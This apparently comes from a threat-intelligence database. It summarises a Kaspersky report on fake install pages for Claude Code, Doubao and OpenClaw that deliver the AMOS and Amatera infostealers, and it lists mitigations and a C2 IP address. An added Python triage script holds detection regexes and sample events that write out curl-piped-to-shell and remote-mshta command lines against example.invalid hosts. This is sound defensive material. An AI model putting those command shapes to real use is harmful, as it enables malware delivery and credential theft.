AMOS and Amatera disguised as AI agents | Kaspersky official blog
Threat actors are advertising pages featuring malicious instructions for installing AI agents like Claude Code, Doubao, and OpenClaw.
AI Analysis
Technical Summary
This threat involves malicious campaigns in which threat actors advertise fake AI agents (Claude Code, Doubao, and OpenClaw) via Google Search ads to lure users into installing infostealer malware. When users search for these AI tools, sponsored ads lead them to counterfeit documentation pages that closely mimic legitimate installation guides. These pages are hosted on reputable platforms like Squarespace, which helps them evade anti-phishing detection. The installation instructions prompt users to execute commands that deploy malware instead of genuine AI software.

On macOS, the malware deployed is AMOS, a spyware infostealer previously documented by Kaspersky, which steals sensitive data. On Windows, the Amatera infostealer is installed using the mshta.exe utility; it harvests browser data, cryptocurrency wallet information, and user folder contents, then exfiltrates them to a remote server.

The attack exploits the rising popularity of AI assistants and workflow automation tools in corporate environments, especially targeting employees who seek unauthorized access to these tools outside official channels. The campaign is a variant of the ClickFix/InstallFix attack pattern, using social engineering and trusted infrastructure to bypass security controls. Although no widespread exploitation is currently known, the threat poses a medium-severity risk due to its potential to compromise corporate secrets and user credentials. Mitigation requires a combination of user awareness training, endpoint security solutions, and policies restricting unauthorized AI tool usage.
Potential Impact
The impact of this threat is significant for organizations globally, particularly those with employees who actively seek AI assistants and workflow automation tools independently. Successful exploitation results in the installation of infostealer malware that compromises confidentiality by harvesting browser credentials, cryptocurrency wallets, and sensitive corporate files. This can lead to data breaches, intellectual property theft, financial losses, and reputational damage. The integrity of corporate projects may be undermined if source code or proprietary information is exfiltrated. Availability is less directly affected, but the presence of malware can degrade system performance and increase incident response costs. The attack leverages social engineering and trusted platforms, increasing the likelihood of successful infection. Organizations with lax controls on software installation or insufficient employee training are at higher risk. The threat also highlights risks associated with shadow IT and unauthorized use of AI tools, which can create new attack vectors. Although no active widespread exploitation is reported, the evolving nature of these campaigns suggests a growing threat landscape.
Mitigation Recommendations
1. Implement comprehensive security awareness training focused on the risks of downloading and installing unauthorized AI tools, emphasizing the dangers of following instructions from unverified sources or ads.
2. Enforce strict application whitelisting and endpoint protection policies that prevent execution of unauthorized scripts or commands, especially those involving curl or mshta.exe utilities.
3. Monitor and restrict employee access to AI assistants and workflow automation tools, providing approved alternatives and official channels to reduce shadow IT usage.
4. Deploy advanced threat detection solutions capable of identifying infostealer behaviors, such as unusual data exfiltration or suspicious command execution patterns.
5. Regularly audit and monitor network traffic for connections to known malicious IP addresses, such as the one used by Amatera (144.124.235.102).
6. Use multi-factor authentication and strong credential management to limit the impact of stolen browser and crypto-wallet data.
7. Collaborate with security vendors to stay updated on emerging threats related to AI tool exploitation and incorporate threat intelligence into security operations.
8. Educate employees on verifying URLs and recognizing legitimate documentation sites, especially when searching for new software tools.
9. Consider deploying browser security extensions or DNS filtering to block access to known malicious domains or phishing sites.
10. Establish incident response procedures specifically addressing malware infections originating from social engineering campaigns involving AI tools.
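The monitoring described in recommendations 2, 4 and 5 can be prototyped as a small triage pass over endpoint telemetry. This is an added example, not code from the Kaspersky article or this page; the event fields (`host`, `cmdline`, `dest_ip`), the two command-line patterns and the sample events are assumptions, and only the IP address comes from the text above.

```python
import re

# IP the page attributes to Amatera; everything else below is constructed.
AMATERA_IP = "144.124.235.102"

# Assumed command shapes (not taken from the campaign): mshta given a remote
# URL, and curl output piped straight into a shell interpreter.
MSHTA_REMOTE = re.compile(r"\bmshta(\.exe)?\b[^|]*\bhttps?://", re.I)
CURL_PIPE_SHELL = re.compile(r"\bcurl\b[^|]*\|\s*(sudo\s+)?(ba|z)?sh\b", re.I)

def classify(event):
    """Return the list of rule names a single event (dict) triggers."""
    hits = []
    cmd = event.get("cmdline", "")
    if MSHTA_REMOTE.search(cmd):
        hits.append("mshta_remote_url")
    if CURL_PIPE_SHELL.search(cmd):
        hits.append("curl_piped_to_shell")
    if event.get("dest_ip") == AMATERA_IP:
        hits.append("amatera_ip_connection")
    return hits

def triage(events):
    """Map host -> sorted rule names, omitting hosts with no hits."""
    findings = {}
    for ev in events:
        for rule in classify(ev):
            findings.setdefault(ev["host"], set()).add(rule)
    return {host: sorted(rules) for host, rules in findings.items()}

# Constructed sample telemetry (process-creation and network events).
SAMPLE_EVENTS = [
    {"host": "win-01", "cmdline": "mshta.exe https://docs.example.invalid/install"},
    {"host": "win-01", "dest_ip": "144.124.235.102"},
    {"host": "mac-07", "cmdline": '/bin/zsh -c "curl -fsSL https://example.invalid/i.sh | bash"'},
    # Benign look-alikes that must not alert: local HTA, plain file download.
    {"host": "win-02", "cmdline": "mshta.exe C:\\Apps\\inventory.hta"},
    {"host": "mac-09", "cmdline": "curl -o report.pdf https://example.invalid/report.pdf"},
]

if __name__ == "__main__":
    for host, rules in triage(SAMPLE_EVENTS).items():
        print(host, rules)
```

A host that triggers both a command-line rule and the IP rule, like `win-01` in the sample, is the strongest candidate for immediate isolation and credential rotation.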
Affected Countries
United States, Brazil, Romania, China, India, United Kingdom, Germany, France, Japan, Australia
Technical Details
- Article Source
- {"url":"https://www.kaspersky.com/blog/fake-ai-agents-infostealers/55412/","fetched":true,"fetchedAt":"2026-03-12T20:59:04.642Z","wordCount":1083}
Threat ID: 69b329192f860ef943f5f8c5
Added to database: 3/12/2026, 8:59:05 PM
Last enriched: 3/12/2026, 8:59:21 PM
Last updated: 3/14/2026, 12:29:21 AM